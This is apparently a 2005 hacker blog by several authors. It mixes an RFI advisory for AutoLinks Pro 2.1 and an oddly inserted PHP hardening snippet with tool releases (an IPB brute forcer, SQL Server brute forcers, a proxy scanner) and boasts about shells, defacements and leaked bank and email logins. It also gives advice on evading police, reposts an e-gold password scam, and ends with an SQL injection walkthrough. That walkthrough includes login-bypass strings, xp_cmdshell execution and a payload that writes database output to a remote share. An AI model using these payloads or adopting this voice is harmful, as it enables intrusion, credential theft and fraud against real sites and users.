by r0t,der4444,cembo,VietMafia

Wednesday, August 31, 2005

AutoLinks Pro 2.1 Remote PHP File Include Vulnerability


Software: AutoLinks Pro
Version: 2.1
Type: Remote PHP File Include Vulnerability
Risk: High

Date: 16.08.05
Vendor: ScriptsCenter
Page: http://www.scriptscenter.com/

Credit:
=======
Credit goes to NewAngels Team and especially 4Degrees.

Description:
============
"AutoLinks 2.1 is a full-featured script making life easier for webmasters
relying extensively on link exchanges to bring traffic to their site. Other
webmasters are able to easily exchange links with you, bringing more visitors
to your site and you also have full control on what sites you want to link."
[Quote from http://www.scriptscenter.com/]

PHP Requirements:
=================
register_globals = On

Vulnerability:
=============
Related source from file "autolinks/al_initialize.php":

>// check for hacking attempt
>if(strstr($alpath,"http://") || strstr($alpath,"https://")) exit("Invalid \$alpath variable");
>
>include($alpath."al_functions.php");

The script does not check whether $alpath contains an absolute URL to a remote
FTP resource.

Exploitation:
=============
/al_initialize.php?alpath=ftp://host.com/

The code in "al_functions.php" will be executed.
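
The quoted check next to a hardened form, as an added example that is not AutoLinks code: `blacklist_check_passes()` reproduces the check from the advisory, while `is_local_include_dir()` and the fixed path assignment are a hypothetical hardening. Function names and sample values are constructed for illustration.

```php
<?php
// Added example: not AutoLinks code. Function names are hypothetical.

// The check quoted in the advisory, as a predicate (true = request is let through).
// It only knows two substrings, so any other scheme still reaches include().
function blacklist_check_passes(string $alpath): bool
{
    return !(strstr($alpath, "http://") || strstr($alpath, "https://"));
}

// Allowlist-style check for the case where the directory must stay configurable:
// reject every "scheme://" prefix, then require a real directory under $appRoot.
function is_local_include_dir(string $alpath, string $appRoot): bool
{
    if ($alpath === '' || strpos($alpath, "\0") !== false) {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $alpath)) {
        return false;
    }
    $real = realpath($alpath);   // false when the path does not exist locally
    $root = realpath($appRoot);
    if ($real === false || $root === false || !is_dir($real)) {
        return false;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strpos($real . DIRECTORY_SEPARATOR, $root) === 0;
}

// Constructed sample values; ftp://host.com/ is the one from the advisory.
$samples = ['http://host.com/', 'https://host.com/', 'ftp://host.com/', __DIR__ . '/'];

foreach ($samples as $s) {
    printf("%-40s blacklist=%-5s allowlist=%s\n", $s,
        blacklist_check_passes($s) ? 'pass' : 'block',
        is_local_include_dir($s, __DIR__) ? 'pass' : 'block');
}

// Preferred fix inside al_initialize.php: assign the path from the script's own
// location before it is used, so a request variable injected by register_globals
// is overwritten instead of trusted.
$alpath = __DIR__ . DIRECTORY_SEPARATOR;
// include($alpath . "al_functions.php");   // commented out: file absent in this demo

// php.ini settings that remove the precondition (allow_url_include exists from PHP 5.2):
//   register_globals  = Off
//   allow_url_include = Off
```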


The author is our very own der4444, though it could have been published here sooner; in short, he has promised to publish new one(s) in a couple of days.

Paid pr0n, for free

On these sites entry is free for blog visitors!

Login:password


Deleted

Hacking IPB 1.x - 2.x.x [brute forcer + member grabber]

Well, I can please the crackers with an IPB brute forcer + user grabber.
The author of the brute forcer and the grabber is Stepbl4b.

I went ahead and tested it.
What can I say: scripts of this kind existed before as well, they just were not released to the public, and mostly they were not .php :)
The thing is fairly slow; as a test rabbit I took the hack.nite.lv forum, which is based on version 2.0.4.
I picked a single password for those roughly 600 users, "parole", and funny as it may be, here is the result:


OK, OK, for a forum like that you can safely use the password "123" as well.

  • brute

  • grabber

    Sunday, August 28, 2005

    Blog statistics

    I took a look at the statistics in counter.hackers.lv and I have to say it was not encouraging at all: only 28 LV IPs today.
    I know it would be easy to set up an EN or even a DE project that would quickly get steady traffic and be remembered.
    Hits as a notion mean nothing to me personally, but the visitor statistics as such do matter.
    Writing in Russian pays off, German pays off, English is popular, but writing in Latvian neither pays off nor is popular.
    But I am here, and so are the others, not in order to be the most popular guys on the block or because it pays off for us.
    So we will boldly keep breaking the ice. :)

    Alt-g Google search tool

    I already wrote about one earlier; this is a completely different one.
    It has the basic search commands, plus you can add your own.


  • download

    SQL Toolz

    Tonight is dedicated to SQL :)

    A pack of SQL tools; its contents:

    SQLPingv1.1

    Description:
    SQLPing can be used to discover detailed information about the connectivity of SQL Server 2000 installations without authentication of any kind. Great tool to track down rogue SQL Server 2000 boxes on your networks or on the Internet - by Chip Andrews (source included)

    Vulnerability Scan Script

    Description:
    This is a vulnerability scanning script submitted by Carlos Perez. It scans your SQL Server instance looking for misconfigurations or insecure settings that you should investigate.

    SQLRecon 1.0

    Description:
    SQLRecon performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support, SQL Server installations are becoming increasingly difficult to discover, assess, and maintain. SQLRecon is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret-out servers you never knew existed on your network so you can properly secure them. .NET Framework v1.1 Required. (Note: Due to .NET policy restrictions on most computers, you'll need to execute the sqlrecon.exe program from a local drive in order to get the full functionality) Documentation available at: http://www.specialopssecurity.com/labs/sqlrecon

    DTS Password Decryptor

    Description:
    DTSConnPass - utility to decrypt DTS package Connection passwords.

    SQLPing.NET 1.3 Beta

    Description:
    This is a pre-release of the 1.3 version of SQLPing for .NET. The new feature added to this version is the capability to determine the actual ssnetlib.dll SQL Server version rather than simply the base version as previous SQLPing editions reported. While not SQLPing's fault (the SQL Resolution Service reports only the base version), this version attempts to rectify that limitation by initiating a connection to the SQL Server. Note that no authentication is needed. Feedback welcome.

    SQLVer

    Description:
    Determines ssnetlib.dll version of SQL Server without the need to log into the server. Uses techniques from SQLPing.NET 1.3 beta but does not actually use the UDP 1434 packet for enumeration. This tool simply connects to the specified TCP port and gets to work! C# Source included. Requires .NET framework.

    SQLPing 2

    Description:
    GUI Version of SQLPing that also includes IP range scanning and brute forcing password checking. Want good fun? On a large development network, put in the network broadcast address in the discovery form. How many SQL Servers can you find? by Chip Andrews. Thanks to Beth Breidenbach and Joseph Kowtko for contributing the IP list functionality. Warning: SQL Server returns only the base version in its SQL Resolution packet. SQLPing shows this info as received. It is not the TRUE version. Updated 3/2/04 for more speed, better output, and adjustable scan wait times.

    SQLPing.NET

    My .NET port for the 1.2 version of SQLPing. Source included. Written in C#. by Chip Andrews

    sp_password.sql

    Modified sp_password stored procedure (tested for SQL 7 - not 6.5) that checks for password strength when changing passwords. Make sure to create a user-defined alert #50001 to display your error. This is proof-of-concept code - not a recommended implementation. by Chip Andrews


    sqlbf.zip

    SQL Server password brute forcing tool by xaphan.
    Usage: sqlbf [ODBC NetLib] [IP List] [User list] [Password List]
    ODBC NetLib: T - TCP/IP, P - Named Pipes (netBIOS)
    IP list - text file containing list of IPs to audit
    User list - text file containing list of usernames
    Password List - text file containing list of passwords


    audit.sql

    Quick little script to check all of your user accounts for weak passwords if you have created a dictionary file somewhere on your server. (see dict.zip)


    sp_decrypt_7.sql

    Description:
    Stored Procedure for SQL Server 2000 that will decrypt encrypted stored procs from a SQL 7 installation. by Jimmers

    version.sql

    Description:
    SQL Script by Ken Klaft to get the exact patch level of a SQL Server by querying the version number. Easily scriptable to allow you to check your entire network for compliance.

    DTSRunDec

    Description:
    Tool by Jimmers to decrypt DTSrun parameters.

    SQL Shield

    Description:
    SQL Shield is a built-in tool for MSSQL 7, 2000 and MSDE servers that claims hacker-proof encryption for triggers, views and procedures. None of the currently available SQL decryptors are capable of cracking SQL Shield encryption.


    XP_CRYPT

    Description:
    Easy-to-use, affordable, and effective security solution for encrypting column and row data in MSSQL Server and Oracle

    Websleuth

    Description:
    Pluggable Web Application Scanner with a plug-in for SQL Injection testing. Useful for spider-ing sites, testing forms, and general application-layer mayhem.


    Extended Stored Proc Removal and Restore Scripts

    Description:
    Scripts to remove and later restore dangerous extended stored procedures (usually to install service packs). by Mark Hatfield and Mohammed Alam of Shavlik Technologies (www.shavlik.com)

    forceSQL

    Description:
    SQL Server password brute force tool that can be used with or without a dictionary. by Nilesh Burghate http://www.nii.co.in/tools.html

    sql2kpwdtools.zip

    Description:
    This is a SQL Server 2K Stored Proc Decrypter + some additional tools. Submitted by Joseph Gama with some additional code from Mark Litchfield and Chris Anley of NGSSoftware.

    decrypt_odbc_sql.txt

    Description:
    Stored proc to decrypt ODBC obfuscated data. When using {Encrypt N'text'} ODBC function to "encrypt" data (what a joke), this routine will allow you to reverse the process. by jimmers

    sqllhf.zip

    Description:
    SQL Server Brute Forcing tool featuring a scriptable command-line interface, scans networks larger than class C, and IP list support. by Matthew Wagenknecht

    sqlpoke.zip

    Description:
    Used to scan a range of IP addresses for SQL Servers and then execute a predefined script. Could be used to track down SQL Servers in your own organization and ensure they stay locked down. - by xaphan

    sqldict.zip

    Description:
    Brute-force SQL Server password utility. Good for auditing SQL Server passwords in your organization. Don't use this power for evil - by Arne Vidstrom.

    dict.zip

    Description:
    Sample dictionary file to be used for password strength testing. Create a table called 'dict' with one field called 'word' (varchar(128) should do, since that's the maximum size of a standard security password in SQL 7) and then run BULK INSERT dict FROM 'c:\myfile.txt'. You may need to use special switches on the BULK INSERT depending on your text file - check BOL if you need help.

    mcpscripts.zip

    Description:
    Script files from my June 2000 MCP Magazine article on constructing your own log-based Intrusion Detection System. by Chip Andrews

    sql7-lib.txt

    Description:
    Snort ruleset for SQL Server monitoring by Todd Garrison

    HFNetChk

    Description:
    Excellent tool for determining hotfix and service pack levels. From Microsoft and Shavlik.

    spdecrypt.zip

    Description:
    Decrypt SQL Server 7.0 stored procedures by David Daniels

    sql2k_spcrypto.txt

    Description:
    Decrypt SQL Server 2000 stored procedures from Bugtraq post by shoeboy



    You can download all these tools here:
  • sqlsecurity


  • Or here, practically the whole set

    XSS and SQL error finder :]


    A good helper tool for vulnerability hunters (diggers), or for bad boys.


  • Download

    LINUX PROXY SCANNER cauz Proxy Hunter SuX

    he he....

    From time to time I have noticed people looking for better options than things like Proxy Hunter (which is pointlessly slow and runs only on Windows).

    A bit about the scanner:


    pr0's linux industrial grade/superfast proxy scanner.

    This proxy scanner was built on the c platform, is 100% stable, & was designed to be a completely self contained proxy scanner, checker & filter. Entire blocks of IP's can be scanned in as little as an hour or 2, like entire blocks...i.e. 216.0.0.1 to 216.255.255.255 in as little as 1 hour!! So you can clearly see the advantages to this. You may feel free to pick apart the code & change it anyway you want but please leave the name "pr0" in the credits, no need for a link to the domain, just a simple "thanks to pr0" would be nice. : )


    One log file will be made with your regular http proxies, & one file will be created at the end of the scan with all of the SSL capable proxies. All the code is here for you to see, tinker with, use as is, or just enjoy! It will scan any set ports that use the http or https protocol.

    On the page entitled scanner.txt you will find the installation instructions, where to place which files on your server, & the line commands needed to be given to the program to begin scanning. Here is an example of one of the commands....

    nohup ./pscan -s startip -e endip -p port1,port2,... -o logfilename -c maxthreads -t maxtimeout

    Which in english would amount to

    nohup ./pscan -s 213.0.0.1 -e 213.254.255.255 -p 80,3128,8080 -o 213.log -c 1000 -t 5

    This would mean you are beginning the pscan process, scanning 213.0.0.1 & ending at 213.254.255.255 & placing the proxies in the log 213.log, setting the maxthreads your server makes at any given time to 1,000 & setting the timeout to 5 seconds.

    Of course on a slower connection you would want to set the timeout to -t 10 or -t 15, and if you are searching for proxies on notoriously slow ranges, or for some god awful reason using a dialup you may even want to set your timeout to -t 25 & threads to 1/2 of normal.



    This scanner was made to be run on a Linux based system, connected to a decent pipe, i.e. a 10mbps switch, however it can be run on your P.C. just not at the great speeds.


    Upon finding a good proxy, the script checks back to a self contained ENV checker on your own server, of course this could be edited in any fashion you wish.



    Here is the bottom line people. On a dual xeon 2.6 with 1gb of ram or a P4 2ghz or above, on a 10mbps unmetered line, or even just a regular OC/DS3 Pipe to the internet that any hosting company would have...or better connection, you should be able to set your connections to 5-10,000, your timeout to 5 seconds, and an entire range such as 213.* will be done within less than one hour. And it will pick up every single possible proxy, filter out the gateways, & create a separate logfile of the proxies which are ssl enabled.

    This scanner puts proxy hunter to shame, point blank : )



  • Download it and change the file format to .rar

    LV proxies and others

    I quite often notice on the LV internet that beginners are always racking their brains over LV proxy servers. In principle you can always find public proxy servers if you want to, but such proxy servers are mostly useful only if your foreign traffic is cut off.
    It is better to set one up yourselves on some box, for example
  • 3proxy
  • and then you can at least feel a little safer, because who knows whose hands your logs end up in.

    Or you can use one of the paid proxy services on offer.
    The cheapest and most convenient of the ones I know is

  • One of the authors of the project is krustevs :)
    The prices are fairly good compared with other services of this kind and quality.

    Here are a couple of proxies

    The proxies of course do not sit on standard ports, and there are constantly new LV proxies; you will of course find proxy or SOCKS servers for practically any country, split by region or by city.

    Saturday, August 27, 2005

    A little about the blog and its authors.

    At the moment the following have been gathered or have joined up.

    You surely already know me (r0t3d3vil).
    Occupation: I will get you the devil himself, to order.

    RaZbH: I would say a good specialist and a cheerful person you can rely on at an important moment.
    He will surely code up something good :)

    23r05m0k3: I got to know him as a lawless type, but on the whole an interesting, spoiled character.
    Occupation: demolishes sites to order.

    roms: I am placing my hopes on this person; for now a dark horse.

    der444: Today one person joined; I do not know whether it is a miracle or not, but he had the patience to use an online translator to read the blog. A very sharp young man who progresses every second; one day he will be a high-level specialist.
    If we get anything from him, it will be in English.
    Involved in several sec. teams; works around the discovery of web application vulnerabilities.


    Perhaps there will be some changes in the near future; everything depends on how well we manage to get along and how good that will be for the future of this blog.
    There seem to be enough people to pull off more than one simple blog, so let a little time pass and we will see.


    Especially for everyone who is unhappy with something here:

    If something about this blog does not suit you, feel free to forget this place.
    If you think you are far superior to this project, then be so; nobody will stop you, if you can actually be what you consider yourselves to be.

    Friday, August 26, 2005

    forex - the latest brain-teaser


    forexvenue.com - an Asian online forex operation; once again I will not spell everything out in advance.


    http://Deleted here is the shell

    or -


    + as a bonus, one of the MySQL passwords: Deleted

    Thursday, August 25, 2005

    Useful online tools


  • here

    Google Talk - Google has released its own messenger

    Google has released its own IM.
    It can be used just like similar ones (MSN, etc.) with a Googlemail account.


  • Google Talk - download here


  • Get Google accounts here

    Online banking/LV

    This time I will turn to online banking in LV and to LV banks in general.
    I can say that LV banks are a relatively secure affair, more secure than many Western European banks if we compare online banking security.
    As an example I will take Hanza Banka, a fairly popular institution.
    It is no secret to anyone that LV banks are mostly meant for money laundering and for all sorts of dubious offshore companies.

    With Hanza Banka, to use the online banking services you cannot do without the TAN card issued to the client, from which, when logging in, you have to enter a TAN number chosen by the system, if it can even be called a TAN number.
    So, if a good coder has particularly steady hands, that number can be obtained, as Western practice has shown; if not, you are out of luck.

    As an example I will give you the logins of two accounts, which you will get frozen fairly quickly :)

    Deleted

    PS. If these were some US banks, it would not be particularly hard for you to control a victim's account, minding a few small details of course.
    By the way, the unwritten law is: thou shalt not rob in thine own backyard!

    Sunday, August 21, 2005

    find out whether your acquaintances are cops

    Look.

    An old joke, but maybe someone did not know this trick: take a fake draugiem.lv account, or a real one, and type vp.gov.lv dp.gov.lv sab.gov.lv into the search.

    Olé. What do we see? Heaps of cops. LOL.

    www.apolo.lv

    This one is not hugely related to hacking, but it is an interesting thing. The idea is that we can type console-style commands into a window to reach various goals that would normally require going around different servers in the browser window, etc.

    To search Google, type: g word
    To search siets, type: siets word
    For Wikipedia: wp word
    etc. ...

    You might at first think this is just a way to pump banner traffic, but it turns out it is not, because the site's authors suggest using the commands directly, e.g. by adding a bookmark to here

    A JavaScript window opens in which you can do everything. In short, it is interesting; maybe someone will start using it. There really are quite a few commands there.

    Saturday, August 20, 2005

    How to hack e-gold accounts - LOL





    Several months ago I came across a program that, as its author said, was the only program that could hack an E-Gold account. That program didn't hack any E-Gold account but deleted all my *.exe files. I tried some other programs of this sort but every time it was the same until a friend of mine mentioned about an easy way to hack an E-Gold account. I was very suspicious until I tried it. What was my surprise when I received a list of E-Gold accounts on my mail together with a list of the passwords of these accounts. With the permission of my friend (whose name I'd rather not tell) (Other mailer bots are not active now)


    HOW TO HACK E-gold !!!!!
    UPDATED INFORMATION, Feb/2005

    REMEMBER THIS WILL ONLY WORK IF YOU HAVE ANY BALANCE IN YOUR A/C HACKING PROCESS:
    Log in to that email account and send an Email to: djfnkjdfnvkjdfnvk;nsdfv
    In the subject line, write: adfvk;jbfdvajdbfvadfv (To confuse the mailerbot)
    In the email body, please write exactly 12 lines, which MUST BE as follows:
    In line 1: Content-Type: text/plain;
    -------------------------------------------------
    In line 2: charset=us-ascii (To make the reply readable)
    -------------------------------------------------
    In line 3: adfgsdfgsthsrtgh srth (To confuse the mailerbot)
    -------------------------------------------------
    In line 4: dfadfvdfvsdf (To make the mailerbot start retrieving information acquired from E-gold.)
    -------------------------------------------------
    In line 5: Your at E-gold A/c No. (To retrieve information from E-gold, The mailerbot now needs a/c no) .
    -------------------------------------------------
    In line 6: start (retrieve > 0) (To activate the mailerbot's retrieval function)
    -------------------------------------------------
    In line 7: verified (*value == float) (To continue the mailerbot's retrieval function)
    -------------------------------------------------
    In line 8: Your E-gold password (Now you have to enter your E-gold password, as the mailerbot was programmed in a way that it sends testing info to E-gold who'll verify each account's password and confirm it with the mailerbot. So in line 8, you have to enter your valid/correct password of your E-gold account.)
    -------------------------------------------------
    In line 9: #safgsgbsfghsrthgr (To search for info of E-gold members who had their addresses confirmed in the last 72 hours)
    -------------------------------------------------
    In line 10: Your email password (By entering the password of your email. The mailerbot will assume this is a command from the administrator and will send out information to the 'administrator' who is actually you.)
    -------------------------------------------------
    In line 11: rthfghsfgbnsfgnbfgn (This will make the mailerbot send all the info to your email)
    -------------------------------------------------
    In line 12: #endofmsg (Last step!)
    -------------------------------------------------
    Note: Please STRICTLY follow the instruction above and you'll be guaranteed to get an automatic reply from the confused mailerbot! Then you'll have email, password and all sorts of information of E-gold users who had their mailing addresses confirmed over the last 72 hours.

    REMINDER: Above is the complete tutorial of hacking into E-gold accounts, and here is a reminder of the most important things mentioned above.
    1) You must have a positive a/c balance in your E-gold account to get the whole thing to work, otherwise the mailerbot will be confused by your code and hence the hacking will fail.
    2) You will get email with all id's & password in 48 hours just try and look results.

    Friday, August 19, 2005

    Proxy/VPN/internet cafe

    Every day I break their laws, not mine.
    Maybe you too are one of those who cannot live/exist without the adrenaline that comes from the information flow you break into.
    OK. Many say you should use such-and-such a proxy or a VPN service to feel safer.
    Then let me tell you a secret: a VPN service is not safe at all, a proxy is not safe either, and a friend of mine got picked up in an internet cafe.
    With every passing day more public proxy servers end up under all sorts of agencies, which let the servers live only in order to collect the information they need. If 2-3 years ago there were heaps of proxy servers and you could use whichever you liked and all was well, then in recent years, this year especially, the situation is quite different: the number of proxy servers has gone down, plus 90% of them serve to collect the needed information.
    VPN: a couple of years ago maybe every fifth VPN service on offer was working under some agency, e.g. the FBI.
    These days it is the other way round: every fifth one does not.
    And even if it does not cooperate, there is the possibility of spoofing the VPN service; only poorly informed country folk can imagine that everyone's arms are too short.

    krustevs from netsec.lv has written two articles about proxy servers that are worth reading:
  • first article


  • second article

  • On proxy/VPN services and their usability you could always rely on krustevs; maybe he sometimes says too little, but even that minimum needs to be analysed thoroughly.
    When I asked him what he uses himself, he said he sits on a laptop via a "zive" and a personal VPN, and if everything is completely hopeless he sits in an internet cafe.
    He entrusts his security only to himself and to nobody else, not even his best friend, let alone VPNs or proxy servers offered on some carder forums, which he certainly has no need for.
    What I can say is that an internet cafe is not bad at all if it is short-term; a "zive" or a borrowed connection: if the relevant agencies turn to the mobile operator, then at most they will be able to determine a 500-metre radius around your location.
    VPN: do not trust popular services, even if they come from people you know; if you act that way you will not get into the kind of trouble the popular Shadow Crew did.

    If you notice, a "bonus from krustevs" has appeared here under the permanent proxy list; of course the list is made up mostly of public proxy servers, and quite a large share of them sit under .edu, which in itself already means they want some kind of information.
    If you are sure that you are breaking some laws, and seriously at that, act safely and entrust your security only to yourself or to a person you can rely on 100%; do not entrust your freedom to any publicly offered services.
    This is a real "alarm"; I myself live in Scandinavia and work in IT, and even at work we have a real "alarm", which is why I wrote this, so that you are not as careless as even many pros are.

    Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)

    Ta-da! The donkey hurries to delight us once again!
    Joy and jubilation are running high!


  • here
  • lol

    Thursday, August 18, 2005

    mpe.lv - Yet another mega provider!

    We already know about no.lv; now let us see what is up with this wonder.

    When you enter their site there is a pointer to an FTP server; look around yourselves. I nearly fell over the first time I got there. I will not comment much after that; there are 3 screenshots. This time I did not switch this mega provider off or even change anything, and did not even leave a backdoor; maybe this kind of ridicule alone will be a lesson for them. Do I really have to prove how cool we are and how clumsy everyone else is?

    http://img300.imageshack.us/img300/1166/ftpanonym0bn.png

    http://img260.imageshack.us/img260/4849/config5nd.png

    http://img300.imageshack.us/img300/4360/shell8oe.png


    PS. Here in the internet cafe I did not really have anything to take screenshots with, so the screenshots are what they are.

    Rootkit Hunter

    So, in case anyone had not noticed, there is this piece of software:
    Rootkit Hunter

    What can it give us?

    1) we can try to test whether someone got into the system before us
    2) check our own rootkits against this tester
    3) learn how to get around this rootkit hunter

    Word is that this hunter is rated well and catches a lot. The description, though, is a bit exaggerated:

    Rootkit scanner is scanning tool to ensure you for about 99.9%* you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:

    - MD5 hash compare
    - Look for default files used by rootkits
    - Wrong file permissions for binaries
    - Look for suspected strings in LKM and KLD modules
    - Look for hidden files
    - Optional scan within plaintext and binary files

    Rootkit Hunter is released as GPL licensed project and free for everyone to use.

    * No, not really 99.9%.. It's just another security layer

    But OK, everyone can judge for themselves. Soon I will drop some program/script of my own here. It could be an ss.lv e-mail harvester or a rootkit scanner neutraliser.

    OFFtopickz




    This is how "hacker" is written in Japanese*.

    Contact information

    r0t3d3vil
    admin@hackers.by.lv
    icq:100010006
    sst:122953

    RaZbH
    icq:195012

    der4444
    icq:242920370

    Wednesday, August 17, 2005

    letter from tunt.lv

    From: stats@tunt.lv
    To: seniorita23@mail.ru
    Date: 17 Aug 2005 00:54:48
    Subject: deleted from TunT statistics - pridels.blogspot.com



    - UNSECURED SYSTEMS - by r0t3d3Vil - pridels.blogspot.com

    has been deleted from the http://stats.TunT.lv statistics list

    the reason for this may be:
    1) the counter code was not placed on the page within the allotted 2 days;
    2) the counter was hidden;
    3) the counter code was modified;
    4) hosts were generated;
    5) the page repeatedly failed to open;
    6) the page has something to do with xxx, illegal mp3, internet money, warez, p2p, dc++;
    7) the page is under construction;
    8) my subjective error.

    If you think this is a mistake, feel free to write and we will sort it out...

    --------------
    If you have received this letter in error, send a reply saying so.


    ////////////////////////////////////////////////////

    You know, even point 7.) has really been violated in only one place, with the "ebooks" :)

    so it is either because of the ebooks or because of 8) ["My subjective error"]

    And if it really is point 8), then what is the use of my writing and relying on the words "feel free to write and we will sort it out"?

    That is a waste of time, so to keep your subjectivism in shape: squat down and hold on (Tupies un Turies)!

    inbox.lv prieksh tiem kam patik luret pa durvju shkkirbu.



    Neskatijos kas vinjos ir man ta lieta ne ipashi , bez vajdzibas nebazhu degunu kur nevajaga un lieki svau laiku neshkkiezhu.
    Pari inbox.lv logini , pa labu naudu var nopirkt visu inbox.lv lietotaju bazi.
    Ja katra zina redzet savu vai drauga vai vienkarshi zinama cilveka loginu tad droshi nemat nomainat paroli , bet ja tie nav jusu tad atbildat par sekam kartejo reizi pashi.


    Dzests

    Tuesday, August 16, 2005

    education.org - learn, and learn again!

    No, no, this is not yet another advertisement, but yet another practice session


    Deleted

    A few anonymous proxy servers

    Mostly they are from CoDeeN http://codeen.cs.princeton.edu/
    So there are a few filters, and logging in will be hit-or-miss, but you can surf or download without a care.


    Morning deface


    This morning I was poking around cPanel, and in the end I found a ready-made option
  • here


  • In any case, I was prompted to the deface by someone who complained that so-and-so did this and that; in principle I do not give a * about all those stories, but this morning it did get my blood up a little that, you see, some hackers hired earlier had supposedly been unable to index the page :)
    I do not know what kind of people he had talked to; surely ones from the crowd who beg for things themselves, but when they find someone who knows a little less than they do, they appoint themselves 3lit3 :)
    Defacing is not my line of work; in any case it was for a change, and otherwise it is too tedious a business to collect some count just to be cooler than some t33m or some other uber-cracker.
    Every third person can deface; only one in 300000 can maintain a secure setup :)

    Monday, August 15, 2005

    SQL Injection Walkthrough

    SQL Injection Walkthrough by SK

    1.0 Introduction
    When a machine has only port 80 open, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, we have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80, and it might just work even if the admin is patch-happy. It attacks the web application (like ASP, JSP, PHP, CGI, etc.) itself rather than the web server or services running in the OS.

    This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote the article because we would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

    1.1 What is SQL Injection?
    It is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.

    1.2 What do you need?
    Any web browser.

    2.0 What you should look for?
    Try to look for pages that allow you to submit data, e.g. a login page, search page, feedback form, etc. Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag in the HTML code. You may find something like this in some HTML code:




    Everything between the <FORM> and </FORM> tags has potential parameters that might be useful (exploit wise).


    2.1 What if you can't find any page that takes input?
    You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URLs that take parameters, like:

    http://duck/index.asp?id=10

    3.0 How do you test if it is vulnerable?
    Start with a single quote trick. Input something like:

    hi' or 1=1--

    Into login, or password, or even in the URL. Example:
    - Login: hi' or 1=1--
    - Pass: hi' or 1=1--
    - http://duck/index.asp?id=hi' or 1=1--

    If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:





    If luck is on your side, you will be logged in without any login name or password.

    3.1 But why ' or 1=1--?
    Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

    http://duck/index.asp?category=food

    In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

    v_cat = request("category")
    sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs=conn.execute(sqlstr)

    As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

    SELECT * FROM product WHERE PCategory='food'

    The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

    Now, assume that we change the URL into something like this:

    http://duck/index.asp?category=food' or 1=1--

    Now our variable v_cat equals "food' or 1=1-- ". If we substitute this in the SQL query, we will have:

    SELECT * FROM product WHERE PCategory='food' or 1=1--'

    The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes, it may be possible to replace the double dash with a single hash "#".

    However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

    ' or 'a'='a

    The SQL query will now become:

    SELECT * FROM product WHERE PCategory='food' or 'a'='a'

    It should return the same result.

    Depending on the actual SQL query, you may have to try some of these possibilities:

    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

    4.0 How do I get remote execution with SQL injection?
    Being able to inject an SQL command usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

    '; exec master..xp_cmdshell 'ping 10.10.1.2'--

    Try using double quote (") if single quote (') is not working.

    The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

    #tcpdump icmp

    If you do not get any ping request from the server, and you get an error message indicating a permission error, it is possible that the administrator has limited the Web User's access to these stored procedures.

    5.0 How to get output of my SQL query?
    It is possible to use sp_makewebtask to write the output of your query into an HTML file:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

    But the target IP must have the folder "share" shared for Everyone.

    6.0 How to get data from the database using ODBC error message
    We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

    http://duck/index.asp?id=10

    We will try to UNION the integer '10' with another string from the database:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

    The system table INFORMATION_SCHEMA.TABLES contains information on all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

    SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

    This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
    /index.asp, line 5

    The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

    To get the next table name, we can use the following query:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

    We also can search for data using LIKE keyword:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
